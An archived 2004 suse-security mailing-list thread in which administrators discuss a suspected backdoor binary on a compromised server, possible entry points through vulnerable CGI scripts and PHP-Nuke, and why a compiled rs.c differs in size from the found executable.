RE: [suse-security] Backdoor over http(s)??
There seem to be a number of security problems with phpnuke - Nessus 2.0.8a lists 8 or more tests for various problems; http://www.phpnuke.org/ says that the latest version is 7.0 and fixes several security problems including SQL injection bugs. I couldn't see 6.9 listed as a release but the site doesn't appear to have much useful information on it - most things highlight security fixes as a matter of urgency, this one seems to use <FONT SIZE=-1> for the security fixes that are listed! I've downloaded the rs.c from the web site and it does compile but it generates a 6.5KB executable not the 450KB executable that you have. I don't think rs.c is either all of the code or it's a different program or possibly a much much earlier incarnation of it. I would think that your Apache logs might tell you more about who executed what and when just prior to the time when the executable appeared on your system. -----Original Message----- From: Mátyás Tibor [mailto:templar@tempi.scene.hu] Sent: 13 January 2004 16:33 To: Rick Green Cc: suse-security@suse.com Subject: Re: [suse-security] Backdoor over http(s)?? I have got in /cgi-bin/ directory: -neomail (1.26) -openwebmail (2.30) -SuSE things -sanecgi but nothing else. And I have Phpnuke 6.9 (?? PHP ??) ----- Ok, somebody could use wget, but what about the .do.sh --> how was it possible, to execute it? Tibor On Tue, 13 Jan 2004 10:33:27 -0500 (EST), Rick Green wrote
Before you get too involved in analysing the content of the file that was imported to your machine, you may want to close the facility that allowed the download in the first place! What have you got in your cgi-bin directory that allows arbitrary use of wget?
-- Rick Green
"They that can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety." -Benjamin Franklin
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
Hemsley, Trevor wrote:
...
I've downloaded the rs.c from the web site and it does compile but it generates a 6.5KB executable not the 450KB executable that you have. I don't think rs.c is either all of the code or it's a different program or possibly a much much earlier incarnation of it. ...
You need to copmile it statically & strip to do a real compare. They are not the same: -r--r--r-- 1 kbrannen users 435444 Jan 8 03:49 rhs -r--r--r-- 1 kbrannen users 396716 Jan 13 10:55 rs rhs: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped rs: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped Kevin
On Tue, Jan 13, 2004 at 04:55:37PM -0000, Hemsley, Trevor wrote:
I've downloaded the rs.c from the web site and it does compile but it generates a 6.5KB executable not the 450KB executable that you have. I don't think rs.c is either all of the code or it's a different program or possibly a much much earlier incarnation of it.
If you compile a static binary and strip symbols from this file you
get nearly the same size.
--
Stefan Tichy
participants (3)
-
Hemsley, Trevor
-
Kevin Brannen
-
Stefan Andreas Tichy